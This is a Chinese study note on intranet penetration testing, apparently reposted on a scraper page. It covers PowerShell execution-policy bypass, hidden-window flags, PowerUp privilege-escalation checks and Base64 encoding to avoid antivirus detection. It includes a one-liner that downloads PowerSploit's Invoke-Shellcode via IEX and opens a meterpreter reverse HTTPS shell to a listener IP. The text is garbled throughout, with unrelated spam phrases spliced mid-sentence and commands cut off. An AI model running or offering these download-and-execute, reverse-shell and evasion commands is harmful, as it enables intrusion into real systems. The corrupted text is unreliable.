TowerBridge是什么意思erBridge在线翻译读音-雅虎在线翻译
2023年4月4日发(作者:福建省最新任命25名厅级干部)
《内⽹安全攻防》学习笔记【1】
内⽹安全攻涣然冰释造句 防
0x01前⾔
还是回归常态了有道云笔记⽤的我不归园田居其一ppt 太舒服⽤这个记⼀下笔记吧,最近开始学内⽹渗透⽅⾯,但是也没有⼀个那种系统的学习⽅法,就先
啃着这本书在看看⼀些⼤佬的⽂章来⼊门。⽂章随缘写,巩固基础,看到哪写到哪,我在思考分开写⽂章还是合理来就在这篇保持更新
0x02PowerShell的使⽤
hell的执⾏策略
为防⽌恶意脚本的执⾏,PowerShell有⼀个执⾏策略,默认情况下,这个执⾏策略被设置为受限。
我们可以使⽤:Get-ExecutionPolicy命令查看PowerShell当前的执⾏策略。它有4个策略。
Restricted:脚本不能运⾏(默认设置)
RemoteSigned:本地创建的脚本可以运⾏,但是从⽹上下载的脚本不能运⾏(拥有数字证书签名的除外)
AllSigned:仅当脚本由受信任的发布者签名时才能运⾏;
Unrestricted:允许所有的脚本执⾏
可⽤这条cmdlit命令设置PowerShell的执⾏策略Set-ExecutionPolicy
注:PowerShell命令不区分⼤⼩写
2.常⽤⽅法
⾸先,⼀个PowerShell脚本其实就是⼀个简单的⽂本⽂件,需要在⽂件名后加上.ps1拓展名
其次想要运⾏PowerShell脚本,必须⽤管理员权限将策略从Restricted变成Unresttricted那么我们在渗透时,就要⽤⼀些⽅法去绕过策略
(1)绕过本地权限并执⾏
1
参数说明:
-ExecutionPolicyBypass(-ExecBypass):绕过执⾏安全策略,这个参数⾮常重要,在默认情况下,PowerShell的安全策略规定了
PowerShell不允许运⾏命令和⽂件。
通过设置这个参数,可以绕过任意⼀个安全保护规则。在渗透测试中,基本每次运⾏PowerShell脚本时都要使⽤这个参数。-----校长
测试⼀下好像对⽬录的要求还挺严格
写到这⾥搜了⼀下powerup是⼀个powershell框架
这⾥我看了⼀下我电脑⾃带了这个⽤Get-Command-Modulepowerup命令查看有没有
但是我猜可能渗透的时候⽬标服务器没有所以都会写上传1脚本?主要看到各种地⽅都写了这⼀步,不知道⾃⼰有哪⾥理解错了,
就也写下来吧
通常,在Windows下可以通过内核漏洞来提升权限。但是,我们常常会碰到⽆法通过内核漏洞提权所处服务器的情况,这个时候就介的组词 需
要利⽤脆弱的Windows服务提权,或者利⽤常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权⾏不通的
时候,帮助我们寻找服务器的脆弱点,进⽽同脆弱点实现提权的⽬的。
然后就可以Import-Moudule加载这个脚本了下载的路径根据个⼈情况
-execbypass-Command\"&{Import-Modulec:1;Invoke-AllChecks}\"
Invoke-AllChecks函数将检查⽬标主机的攻击向量以进⾏权限提升
该模块会⾃动执⾏PowerUp下所有的脚本来检查⽬标主机
(2)从⽹站服务器下载脚本绕过本地权限并隐藏执⾏
-ExecutionPolic1
参数说明
-WindowStyleHidden(-wHidden):隐藏窗⼝
-NoLogo:启动不显⽰版权标志的Po孙子兵法与三十六计 电视剧 wershell
-NoProfile(-No落花有意 p):PowerShell控制台不加载当前⽤户的配置⽂件
-NonInteractive(-NonI):⾮交互模式.PowerShell不为⽤户提供交互式的提⽰
-noexit:执⾏后不退出Shell(这个参数在使⽤键盘记录等脚本时⾮常重要)
顺便书上看不明⽩的在校长那看明⽩了
-ExecutionPolicyBypass-WindowStyleHidden-NoProfile-NonIIEX(ent).DownloadString(\'usercont
/c所见的作者 heetz/PowerSploit/master/CodeExecution/1\');Invoke-Shellcode争渡争渡惊起一滩鸥鹭的画面 -Paylo唐诗三百首清明时节雨纷纷全诗 adwindows/meterpreter/reverse_https-Lhost192.168
.82.131-Lport1234
这段是利⽤IEX下载远程PS1脚本绕过权限执⾏链接处只能⽤单引号
隔壁⽂章拓展的我不太看得懂,因为我不会msf等我会了再说
(3)使⽤Base64对PowerShell进⾏编码
使⽤Base64对Powershell命令进⾏编码的⽬的是混淆和压缩代码,从⽽避免脚本因为⼀些特殊字符被杀毒软件查杀
可以使⽤python脚本对命令编码脚本地址在使⽤这个脚本进⾏⽂本转换的时候,对象必须为⽂本⽂件
在上⾯命令后⾯加个>即可
然后给ps_授予执⾏权限
chmod+xps_
(默认是⽤kali的所以windows当然不⾏别问这种奇怪的问题)
编码
./ps_
3.运⾏32位和64位PowerShell
⼀些PowerShell脚本只能运⾏在指定的平台上
在64位的windows系统中存在两个版本的powershell⼀个x64⼀个x86两个版本的执⾏策略不会互相影响x64版本配置⽂件
在%windir%syswow64WindowsPowerShellv1.0
所以执⾏的天气预报最新天气预报 命令如下
32位
-NoP-NonI-WHidden-ExecBypass
64位
%WinDir%-NoP-NonI-WHidden-ExecBypass
暂且休息搭建内⽹环境过段时间再说
更多推荐
restricted是什么意思tricted在线翻译读音
发布评论